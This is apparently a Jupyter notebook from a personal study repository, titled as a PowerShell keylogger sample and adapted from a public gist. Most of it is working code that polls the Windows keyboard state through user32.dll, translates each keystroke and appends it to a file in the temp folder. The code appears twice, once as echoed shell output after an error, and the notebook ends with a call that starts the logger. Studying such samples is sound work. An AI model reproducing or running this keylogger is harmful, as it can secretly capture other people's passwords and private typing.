# 1907-keylogger-sample

## overview

- powershellによるキーボードのEventを監視して、その内容をLoggingする

## reference 

- Simple Windows Keylogger using PowerShell 
    - https://gist.github.com/dasgoll/7ca1c059dd3b3fbc7277

## sample code

In [2]:
dir $env:temp


dir $env:temp


    Directory: G:\Users\sakai\AppData\Local\Temp


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       27/07/2019     04:16                5C5BCF1E-2E0C-4368-9C12-7BE489EB7A01.aplzod                           
d-----       22/07/2019     09:49                ActivityVisualCache                                                   
d-----       27/07/2019     08:16                B0BF2ADD-14AE-4CF6-8F60-AE4097D48F40                                  
d-----       29/07/2019     18:56                comtypes_cache                                                        
d-----       24/06/2019     12:08                Diagnostics                                                           
d-----       29/07/2019     18:56                Enote Utility                               

In [3]:
#requires -Version 2
function Start-KeyLogger($Path="$env:temp\keylogger.txt") 
{
  # Signatures for API Calls
  $signatures = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 
public static extern short GetAsyncKeyState(int virtualKeyCode); 
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@
  # load signatures and make members available
  $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
    
  # create output file
  $null = New-Item -Path $Path -ItemType File -Force
  try
  {
    Write-Host 'Recording key presses. Press CTRL+C to see results.' -ForegroundColor Red
    # create endless loop. When user presses CTRL+C, finally-block
    # executes and shows the collected key presses
    while ($true) {
      Start-Sleep -Milliseconds 40
      
      # scan all ASCII codes above 8
      for ($ascii = 9; $ascii -le 254; $ascii++) {
        # get current key state
        $state = $API::GetAsyncKeyState($ascii)
        # is key pressed?
        if ($state -eq -32767) {
          $null = [console]::CapsLock
          # translate scan code to real code
          $virtualKey = $API::MapVirtualKey($ascii, 3)
          # get keyboard state for virtual keys
          $kbstate = New-Object Byte[] 256
          $checkkbstate = $API::GetKeyboardState($kbstate)
          # prepare a StringBuilder to receive input key
          $mychar = New-Object -TypeName System.Text.StringBuilder
          # translate virtual key
          $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
          if ($success) 
          {
            # add key to logger file
            [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) 
          }
        }
      }
    }
  }
  finally
  {
    # open logger file in Notepad
    notepad $Path
  }
}


#requires -Version 2
An error occurred while creating the pipeline.
    + CategoryInfo          : NotSpecified: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : RuntimeException
 
function Start-KeyLogger($Path="$env:temp\keylogger.txt") 
>> {
>>   # Signatures for API Calls
>>   $signatures = @'
>> [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 
>> public static extern short GetAsyncKeyState(int virtualKeyCode); 
>> [DllImport("user32.dll", CharSet=CharSet.Auto)]
>> public static extern int GetKeyboardState(byte[] keystate);
>> [DllImport("user32.dll", CharSet=CharSet.Auto)]
>> public static extern int MapVirtualKey(uint uCode, int uMapType);
>> [DllImport("user32.dll", CharSet=CharSet.Auto)]
>> public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
>> '@
>>   # load signatures and make members available
>>   $API = Add-Type -MemberDefinition $signa

In [ ]:
Start-KeyLogger